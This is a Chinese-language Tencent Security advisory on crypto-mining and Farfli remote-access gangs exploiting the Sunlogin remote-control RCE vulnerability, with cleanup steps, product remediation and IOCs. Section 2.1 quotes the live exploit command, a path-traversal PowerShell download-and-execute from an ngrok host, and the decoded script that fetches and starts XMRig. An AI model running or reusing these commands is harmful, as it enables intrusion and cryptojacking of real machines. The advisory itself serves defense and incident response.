多個黑產團伙利用向日葵遠控軟件RCE漏洞攻擊傳播

一、概述

近日，騰訊安全威脅情報中心檢測到有挖礦、遠控黑產團伙利用向日葵遠控軟件RCE漏洞攻擊企業主機和個人電腦，已有部分未修復漏洞的主機、個人電腦受害。攻擊者利用漏洞入侵後可直接獲得系統控制權，受害主機已被用於門羅幣挖礦。

在部分城市因疫情管理需要，遠程辦公場景增多，向日葵類遠程控制軟件的應用也會增加，從而系統被黑客利用漏洞入侵控制的風險也隨之增加。騰訊安全專家建議政企機構與個人電腦用戶將向日葵遠控軟件升級到最新版本以修復漏洞，建議避免將不必要的端口及服務在公網開放，避免將個人遠控軟件安裝在業務服務器中。推薦使用騰訊零信任iOA、或騰訊電腦管家進行病毒掃描，排查系統是否已被入侵，採用零信任iOA解決遠程安全接入需求，避免疫情期間系統被黑客控制而造成損失。

向日葵是一款免費的，集遠程控制電腦、手機、遠程桌面連接、遠程開機、遠程管理、支持內網穿透等功能的一體化遠程控制管理軟件。今年2月，向日葵個人版V11.0.0.33之前的版本與簡約版V1.0.1.43315（2021.12）之前的版本被披露存在遠程代碼執行（RCE）漏洞，漏洞編號CNVD-2022-10270，CNVD-2022-03672。

存在漏洞的系統啓動服務端軟件後，會開放未授權訪問端口，攻擊者可通過未授權訪問無需密碼直接獲取session，並藉此遠程執行任意代碼。從而導致存在漏洞的個人電腦或服務器被黑客入侵控制。

在上述高危漏洞出現後，騰訊安全旗下的主機安全產品、零信任iOA、漏洞掃描服務、高危威脅檢測系統均已支持對向日葵RCE漏洞的檢測和防禦。

騰訊零信任iOA攔截利用向日葵RCE漏洞的攻擊

本次利用向日葵遠程代碼執行漏洞攻擊傳播的挖礦木馬爲XMRig（門羅幣）挖礦程序，企業或個人用戶可參考以下內容自查後清理：

1.查看任務管理器，結束高CPU/GPU佔用的程序；

2.查看c:\users\public\目錄下是否存在木馬文件xmrig.exe、WinRing0x64.sys、config.json，如果有，就刪除這些文件。

遠控木馬使用Farfli家族開源代碼編譯而成，自查與清理方式：

1.查看Svchost下的服務名，清理服務NETRUDSL

通過運行msconfig，或regedit檢查以下相關係統服務是否存在：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost

2.刪除遠控木馬文件

C:\Windows\33649531.dll（在不同主機上33649531爲隨機8位數字）

騰訊安全系列產品已支持檢測、查殺利用向日葵遠程代碼執行漏洞攻擊傳播的XMRig類挖礦木馬與Farfli家族遠控木馬，具體響應清單如下：

二、詳細分析

2**.1****挖礦木馬**

利用漏洞投遞並執行惡意腳本：

ping../../../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe -exec bypass -noexit -C IEX (new-object system.net.webclient).downloadstring(/"http://pingce.jp.ngrok.io/ob.ps1/")

腳本內容解碼後如下：

$url = "http://pingce.jp.ngrok.io/xmrig.exe"

$url2 = "http://pingce.jp.ngrok.io/config.json"

$url3 = "http://pingce.jp.ngrok.io/WinRing0x64.sys"

$output = "C:\users\public\xmrig.exe"

$output2 = "C:\users\public\config.json"

$output3 = "C:\users\public\WinRing0x64.sys"

$wc = New-Object System.Net.WebClient

$wc.DownloadFile($url, $output)

$wc.DownloadFile($url2, $output2)

$wc.DownloadFile($url3, $output3)

taskkill /f /t /im xmrig.exe

Remove-Item -Path "C:\Users\public\c3pool" -Recurse

Start-Sleep -s 15

start-process "c:\users\public\xmrig.exe" -ArgumentList "-c c:\users\public\config.json"

釋放系統挖礦進程，啓動指定配置的XMRig挖礦程序。

2**.2****遠控木馬**

木馬外殼分區段裝載遠控木馬，tProtectVirtualMemory修改內存屬性爲可讀可執行。

 

最終釋放出的可執行文件爲Farfli家族開源代碼編譯而成的遠控木馬。

該木馬對外提供的功能模塊

開源的Farfli遠控木馬的功能模塊包含文件管理、鍵盤記錄、遠程桌面控制、系統管理、視頻查看、語音監聽、遠程定位等遠程操縱功能。

例如本樣本中的遠程桌面控制功能，通過修改兩個註冊表項配置可遠程訪問，並設置遠程登錄tcp會話作爲控制檯會話，繞過網絡對於tcp遠程訪問的限制，修改的註冊表項目如下：

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\TSUserEnabled

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\TSAppCompat

|

三、威脅處置手冊

1**.清理木馬**

雲主機用戶可使用騰訊主機安全的快掃功能，清理查殺利用向日葵遠控RCE漏洞攻擊傳播的後門木馬：
通過騰訊主機安全（雲鏡）控制檯，入侵檢測->文件查殺，檢測全網資產，檢測惡意文件，若發現，可進行一鍵隔離操作。

步驟如下：

A: 主機安全(雲鏡)控制檯：入侵檢測->文件查殺，選擇一鍵檢測：

B：彈出一鍵檢測設置，選擇快速掃描，全部專業版主機後開啓掃描：

C：查看掃描出的木馬風險結果項

D：對檢出的木馬文件進行一鍵隔離（注意勾選隔離同時結束木馬進程選項）

**2.**修復漏洞

雲主機可使用騰訊主機安全（雲鏡）的漏洞檢測修復功能，協助用戶快速修補相關高危漏洞，用戶可登錄騰訊主機安全控制檯，依次打開左側“漏洞管理”，對掃描到的系統組件漏洞、web應用漏洞、應用漏洞進行排查。

步驟細節如下：
A：主機安全（雲鏡）控制檯：打開漏洞管理->漏洞風險檢測，點擊一鍵檢測，進行資產漏洞掃描

B：查看掃描到的向日葵遠程代碼執行漏洞風險項目詳情

C：根據檢測結果，對檢測到有風險的資產進行漏洞修復（登錄相應主機，升級向日葵遠控工具軟件到最新版本）。

D：回到主機安全（雲鏡）控制檯再次打開“漏洞管理”，重新檢測確保資產已不受漏洞影響。

**3.**防禦

騰訊雲防火牆已支持檢測防禦利用向日葵遠程代碼執行漏洞的攻擊，公有云客戶可以開通騰訊雲防火牆高級版進行有效防禦：

在騰訊雲控制檯界面，打開入侵防禦設置即可。

IOC****s

【挖礦木馬】

Do****main

pingce[.]jp[.]ngrok[.]io

md****5

0c0195c48b6b8582fa6f6373032118da

e6d26c76401c990bc94f4131350cde3e

【遠控】

C2

s1[.]yk[.]hyi8mc[.]top

m****d5

3f5da20aff1364faa177e90ac325cbd0

dd4786854b9e61fa1637d69a3eb71f93